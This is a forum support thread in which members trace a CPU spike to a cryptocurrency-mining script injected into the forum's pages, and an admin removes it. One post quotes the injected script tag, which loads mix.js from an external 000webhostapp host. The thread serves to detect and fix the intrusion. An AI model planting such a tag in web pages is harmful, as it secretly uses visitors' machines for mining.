Forum Suggestions / Issues

Status
Not open for further replies.
The software couldn't take people using the general threads when the specific topic is covered by a special thread anymore. ;) :p

Something went wrong with the database backups and they filled up the server's hard drive. PacketCollision fixed it yesterday. :)

Good!

Also, good to see you post! :)

Before I dig deeper into the possible issues on my end: I just noticed a sudden spike in CPU load caused by the chrome tab that has the forums open. And I am talking 50-75% while playing Battlefield causing that to crawl at 10fps. Same load now still. When I kill the chrome tab that causes it, it's FG.com?! Closing/reopening (tab and chrome completely) doesn't change anything, neither does incognito mode.

Last edited:
hmm .. there seems to be an crypto currrency mining Javascript running in background.

Yeah, definitely something iffy here. uBlock was filtering it for me as well, but CPU spikes if I disable it.

Code:
<script src="https://asdasdasdasdasdsad.000webhostapp.com/jsisorry/mix.js"></script>
Should this be in the page source code?

corrupted vbulletin update ?

Fun. Yet another reason why we need to upgrade to the latest version of vBulletin.

I've removed the script from the template files.

Whoa. If only all tech support was this quick and efficient.

Searching, e.g. the "What's New" page, gives me a database error page :(

I was testing an upgrade to the forums and accidentally upgraded the real forums instead of the test forums. Whoops! PC restored from a backup.

Whoa. If only all tech support was this quick and efficient.

if only all customers were this knowledgeable!
i've never had a customer call me to point me to the exact line of code that gives the error :lol:

Last edited:
Status
Not open for further replies.